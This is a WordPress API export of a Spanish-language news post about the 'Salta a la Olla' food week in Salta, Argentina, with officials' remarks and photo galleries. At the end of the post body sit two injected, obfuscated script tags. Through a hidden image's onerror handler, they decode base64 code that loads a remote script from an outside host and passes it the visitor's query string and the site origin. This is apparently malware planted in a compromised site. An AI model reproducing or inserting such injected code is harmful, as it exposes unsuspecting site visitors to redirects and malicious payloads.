{"id":1709,"date":"2022-11-02T14:24:58","date_gmt":"2022-11-02T17:24:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1709"},"modified":"2025-08-14T00:31:32","modified_gmt":"2025-08-14T03:31:32","slug":"saltenos-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1709","title":{"rendered":"Salte\u00f1os y turistas pueden disfrutar hasta el 6 de noviembre de la semana gastron\u00f3mica \u201cSalta a la Olla\u201d"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#9f062c\"><em>La oferta puede ser consultada en las redes sociales de @camarahotelerasalta. Se llevar\u00e1n a cabo eventos especiales, charlas, clases magistrales, concursos, ferias de comidas, adem\u00e1s de promociones y descuentos en restaurantes y hoteles.<\/em><\/h5>\n\n\n\n<p>El lanzamiento de la&nbsp;<strong>Semana Gastron\u00f3mica<\/strong>&nbsp;se realiz\u00f3 este mediod\u00eda desde el Monumento a G\u00fcemes donde representantes del sector privado, p\u00fablico y turistas convergieron para presentar \u201cSalta a la Olla\u00bb, actividad organizada por la C\u00e1mara Hotelera Gastron\u00f3mica y Afines, con el acompa\u00f1amiento del&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>.<\/p>\n\n\n\n<p>Hasta el 6 de noviembre se llevar\u00e1n a cabo eventos especiales, charlas, clases magistrales, concursos, ferias de comidas, adem\u00e1s de promociones y descuentos en restaurantes y hoteles. Es un trabajo conjunto entre el sector p\u00fablico y privado, sectores que trabajan para difundir la diversidad gastron\u00f3mica.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4657-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4657-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.JPG\" alt=\"Salte\u00f1os y turistas pueden disfrutar hasta el 6 de noviembre de la semana gastron\u00f3mica \u201cSalta a la Olla\u201d\"\/><\/a><\/figure>\n\n\n\n<p>En el lanzamiento estuvieron presentes, el ministro de Turismo y Deportes de la Provincia&nbsp;<strong>Mario Pe\u00f1a<\/strong>, el secretario de Cultura y Turismo municipal, Fernando Garc\u00eda Soria, el presidente de la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines, Juan Lucero y el vicepresidente de la Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina (FEHGRA)&nbsp;<strong>Rodrigo Verde<\/strong>. &nbsp;<\/p>\n\n\n\n<p>\u201cCuando hablamos de Salta tambi\u00e9n lo hacemos de gastronom\u00eda porque tiene que ver con nuestra identidad\u201d, se\u00f1al\u00f3 el ministro Mario Pe\u00f1a quien resalt\u00f3 la decisi\u00f3n pol\u00edtica de avanzar con un trabajo en conjunto. \u201cSalta produce con una gran diversidad de productos, hay una gran cadena de valor y eso significa trabajo para los salte\u00f1os\u201d.<\/p>\n\n\n\n<p>El funcionario tambi\u00e9n mencion\u00f3 el plan Camino a Km 0 que est\u00e1 en etapa de inscripci\u00f3n de establecimientos que desean certificar bajo este concepto que es tendencia mundial que prioriza el uso de productos de cercan\u00eda y naturales.<\/p>\n\n\n\n<p>En tanto Juan Lucero destac\u00f3 el trabajo que se realiz\u00f3 gracias al trabajo en equipo del sector p\u00fablico y privado, e invit\u00f3 a sumarse a esta semana que pone en valor la gastronom\u00eda de Salta. La oferta puede ser consultadas en las redes sociales de @camarahotelerasalta . &nbsp;<\/p>\n\n\n\n<p>Participaron el presidente de la C\u00e1mara de Turismo de Salta Gustavo Di M\u00e9cola, la presidenta de la Asociaci\u00f3n de Hoteles de Turismo, Mariana Farjat, directores municipales de turismo y referentes de la actividad.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1711\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.jpg\" alt=\"\" class=\"wp-image-1711\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1779-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1710\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.jpg\" alt=\"\" class=\"wp-image-1710\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1780-saltenios-y-turistas-pueden-disfrutar-hasta-el-6-de-noviembre-de-la-semana-gastronomica-salta-a-la-olla-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La oferta puede ser consultada en las redes sociales de @camarahotelerasalta. Se llevar\u00e1n a cabo eventos especiales, charlas, clases magistrales, concursos, ferias de comidas, adem\u00e1s de promociones y descuentos en restaurantes y hoteles. El lanzamiento de la&nbsp;Semana Gastron\u00f3mica&nbsp;se realiz\u00f3 este mediod\u00eda desde el Monumento a G\u00fcemes donde representantes del sector privado, p\u00fablico y turistas convergieron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1710,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[3],"tags":[],"class_list":{"0":"post-1709","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-gourmet"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1709"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1709"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1709\/revisions"}],"predecessor-version":[{"id":7294,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1709\/revisions\/7294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1710"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1709"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1709"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1709"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}